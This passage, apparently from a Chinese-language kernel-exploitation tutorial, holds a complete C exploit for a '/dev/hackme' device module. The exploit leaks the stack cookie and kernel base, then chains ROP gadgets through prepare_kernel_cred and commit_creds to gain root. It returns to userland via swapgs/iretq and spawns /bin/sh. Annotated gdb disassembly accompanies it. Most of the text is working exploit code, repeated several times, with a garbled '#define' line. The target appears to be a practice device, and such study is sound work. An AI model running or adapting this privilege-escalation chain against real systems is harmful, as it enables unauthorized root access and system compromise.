ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fc;

unsigned long read_rax_pop1_ret = kernel_base + 0x0000000000015a80; // mov eax, dword ptr [rax]; pop rbp; ret;
unsigned long pop_rax_ret = kernel_base + 0x0000000000004d11; // pop rax; ret;
unsigned long mov_rsi_rax_pop1_ret = kernel_base + 0x000000000000db06; // mov rsi, rax; mov rax, rsi; pop rbp; ret;

unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// read value_offset from ksymtab_prepare_kernel_cred and restore into esi
payload[off++] = pop_rax_ret;
payload[off++] = ksymtab_prepare_kernel_cred;
payload[off++] = read_rax_pop1_ret;
payload[off++] = 0;
payload[off++] = mov_rsi_rax_pop1_ret;
payload[off++] = 0;

// read value_offset from ksymtab_commit_creds and restore into eax
payload[off++] = pop_rax_ret;
payload[off++] = ksymtab_commit_creds;
payload[off++] = read_rax_pop1_ret;
payload[off++] = 0;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)calc_kernel_symbols;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

signed int offset_commit_creds;
signed int offset_prepare_kernel_cred;
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
void calc_kernel_symbols(void){

__asm__(
".intel_syntax noprefix;"
"mov offset_prepare_kernel_cred, esi;"
"mov offset_commit_creds, eax;"
".att_syntax;"
);
prepare_kernel_cred = ksymtab_prepare_kernel_cred + offset_prepare_kernel_cred;
commit_creds = ksymtab_commit_creds + offset_commit_creds;
printf("[*] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
printf("[*] commit_creds: %lx\n", commit_creds);
}

成功泄露内核函数的地址:

5.2.4 ROP提权

commit_credsprepare_kernel_cred的地址泄露出来后,就可以进行最终的ROP,完成提权了。

这里,我还是分开两次来进行ROP,第一次ROP调用prepare_kernel_cred(0),将返回值存到rsi寄存器后,返回用户态函数,在用户态函数中将rsi寄存器中的root cred地址取出,然后再进行一次ROP调用commit_cred(root_cred)

因为.text段中没找到能将rax赋给rdi的gadget,就无法直接在ROP中将prepare_kernel_cred(0)的返回值作为参数传给commit_creds()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
void calc_kernel_symbols(void){

__asm__(
".intel_syntax noprefix;"
"mov offset_prepare_kernel_cred, esi;"
"mov offset_commit_creds, eax;"
".att_syntax;"
);
prepare_kernel_cred = ksymtab_prepare_kernel_cred + offset_prepare_kernel_cred;
commit_creds = ksymtab_commit_creds + offset_commit_creds;
printf("[*] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
printf("[*] commit_creds: %lx\n", commit_creds);

rop_prepare_kernel_cred();
}

void rop_prepare_kernel_cred(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;

payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// prepare_kernel_cred(0)
payload[off++] = kernel_base + 0x0000000000006370; // pop rdi; ret;
payload[off++] = 0;
payload[off++] = prepare_kernel_cred;
payload[off++] = kernel_base + 0x000000000000db06; // mov rsi, rax; mov rax, rsi; pop rbp; ret;
payload[off++] = 0;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)rop_commit_cred;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] ROP prepare_kernel_cred(0)");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

unsigned long root_cred;
void rop_commit_cred(void){
__asm__(
".intel_syntax noprefix;"
"mov root_cred, rsi;"
".att_syntax;"
);

printf("[*] root_cred: %lx\n", root_cred);

unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;

payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(root_cred)
payload[off++] = kernel_base + pop_rdi_ret; // return address
payload[off++] = root_cred;
payload[off++] = commit_creds;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)get_shell;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] rop commit_cred(root_cred)");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

总结EXP

总结整个利用过程:

  • 泄露内核基地址
  • 在.text段中寻找gadget
  • 读取内核符号表中的偏移,计算出目标内核函数的地址
  • 进行多次ROP完成提权语句的执行
  • 返回用户态get shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
// gcc ret2usr.c -fPIE -static -o ret2usr

#define _GN U_S OURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>

void open_dev();
void save_state()
void leak_cookie_kernel(void);
void calc_kernel_symbols(void);
void leak_kernel_symbols(void);
void calc_kernel_symbols(void);
void rop_prepare_kernel_cred(void);
void rop_commit_cred(void);
void get_shell(void);


int global_fd;

// 打开 /dev/hackme 设备
void open_dev(){
global_fd = open("/dev/hackme", O_RDWR);
if (global_fd < 0){
puts("[!] Failed to open device");
exit(-1);
} else {
puts("[*] Opened device");
}
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// 将后面iretq时需要恢复的寄存器保存到本地变量中
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void print_leak(unsigned long *leak, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
printf("%u: %lx\n", i, leak[i]);
}
}

unsigned long cookie;
unsigned long kernel_leak;
unsigned long kernel_base;

void leak_cookie_kernel(void){
unsigned n = 50;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80
kernel_leak = leak[38]; // kernel addr 与 tmp偏移0x130
kernel_base = kernel_leak - 0xa157;

printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
printf("[*] Kernel Base: %lx\n", kernel_base);
}

unsigned long ksymtab_commit_creds;
unsigned long ksymtab_prepare_kernel_cred;
void leak_kernel_symbols(void){
ksymtab_commit_creds = kernel_base + 0xf87d90;
ksymtab_prepare_kernel_cred = kernel_base + 0xf8d4fc;

unsigned long read_rax_pop1_ret = kernel_base + 0x0000000000015a80; // mov eax, dword ptr [rax]; pop rbp; ret;
unsigned long pop_rax_ret = kernel_base + 0x0000000000004d11; // pop rax; ret;
unsigned long mov_rsi_rax_pop1_ret = kernel_base + 0x000000000000db06; // mov rsi, rax; mov rax, rsi; pop rbp; ret;

unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// read value_offset from ksymtab_prepare_kernel_cred and restore into esi
payload[off++] = pop_rax_ret;
payload[off++] = ksymtab_prepare_kernel_cred;
payload[off++] = read_rax_pop1_ret;
payload[off++] = 0;
payload[off++] = mov_rsi_rax_pop1_ret;
payload[off++] = 0;

// read value_offset from ksymtab_commit_creds and restore into eax
payload[off++] = pop_rax_ret;
payload[off++] = ksymtab_commit_creds;
payload[off++] = read_rax_pop1_ret;
payload[off++] = 0;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)calc_kernel_symbols;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] ROP leak kernel functions");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

signed int offset_commit_creds;
signed int offset_prepare_kernel_cred;
unsigned long prepare_kernel_cred;
unsigned long commit_creds;
void calc_kernel_symbols(void){

__asm__(
".intel_syntax noprefix;"
"mov offset_prepare_kernel_cred, esi;"
"mov offset_commit_creds, eax;"
".att_syntax;"
);
prepare_kernel_cred = ksymtab_prepare_kernel_cred + offset_prepare_kernel_cred;
commit_creds = ksymtab_commit_creds + offset_commit_creds;
printf("[*] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
printf("[*] commit_creds: %lx\n", commit_creds);

rop_prepare_kernel_cred();
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
void rop_prepare_kernel_cred(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;

payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// prepare_kernel_cred(0)
payload[off++] = kernel_base + 0x0000000000006370; // pop rdi; ret;
payload[off++] = 0;
payload[off++] = prepare_kernel_cred;
payload[off++] = kernel_base + 0x000000000000db06; // mov rsi, rax; mov rax, rsi; pop rbp; ret;
payload[off++] = 0;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)rop_commit_cred;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] ROP prepare_kernel_cred(0)");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

//
unsigned long root_cred;
void rop_commit_cred(void){
__asm__(
".intel_syntax noprefix;"
"mov root_cred, rsi;"
".att_syntax;"
);

printf("[*] root_cred: %lx\n", root_cred);

unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;

payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp

// commit_creds(root_cred)
payload[off++] = kernel_base + 0x0000000000006370; // pop rdi; ret;
payload[off++] = root_cred;
payload[off++] = commit_creds;

// switch user space cr3 and swapgs and iretq
payload[off++] = kernel_base + 0x00000000200f26; // swapgs_restore_regs_and_return_to_usermode
payload[off++] = 0;
payload[off++] = 0;
payload[off++] = (unsigned long)get_shell;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] rop commit_cred(root_cred)");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

int main() {

save_state();

open_dev();

leak_cookie_kernel();

leak_kernel_symbols();

puts("[!] Should never be reached");

return 0;
}


/*
swapgs_restore_regs_and_return_to_usermode+20:

0xffffffff81200f26 <_stext+2101030>: mov %rsp,%rdi ; 保存旧栈
0xffffffff81200f29 <_stext+2101033>: mov %gs:0x6004,%rsp ; 更换栈
0xffffffff81200f32 <_stext+2101042>: pushq 0x30(%rdi) ; 把旧栈中的值压到新栈
0xffffffff81200f35 <_stext+2101045>: pushq 0x28(%rdi)
0xffffffff81200f38 <_stext+2101048>: pushq 0x20(%rdi)
0xffffffff81200f3b <_stext+2101051>: pushq 0x18(%rdi)
(gdb)
0xffffffff81200f3e <_stext+2101054>: pushq 0x10(%rdi)
0xffffffff81200f41 <_stext+2101057>: pushq (%rdi)
0xffffffff81200f43 <_stext+2101059>: push %rax
0xffffffff81200f44 <_stext+2101060>: xchg %ax,%ax
0xffffffff81200f46 <_stext+2101062>: mov %cr3,%rdi
0xffffffff81200f49 <_stext+2101065>: jmp 0xffffffff81200f7f <_stext+2101119>
...
(gdb) x/10i 0xffffffff81200f7f
0xffffffff81200f7f <_stext+2101119>: or $0x1000,%rdi
0xffffffff81200f86 <_stext+2101126>: mov %rdi,%cr3
0xffffffff81200f89 <_stext+2101129>: pop %rax
0xffffffff81200f8a <_stext+2101130>: pop %rdi
0xffffffff81200f8b <_stext+2101131>: swapgs
0xffffffff81200f8e <_stext+2101134>: nopl (%rax)
0xffffffff81200f91 <_stext+2101137>: jmpq 0xffffffff81200fc0 <_stext+2101184>
...
(gdb) x/10i 0xffffffff81200fc0
0xffffffff81200fc0 <_stext+2101184>: testb $0x4,0x20(%rsp)
0xffffffff81200fc5 <_stext+2101189>: jne 0xffffffff81200fc9 <_stext+2101193>
0xffffffff81200fc7 <_stext+2101191>: iretq

*/

Comments Section | 评论区
Privacy Policy Application Terms of Service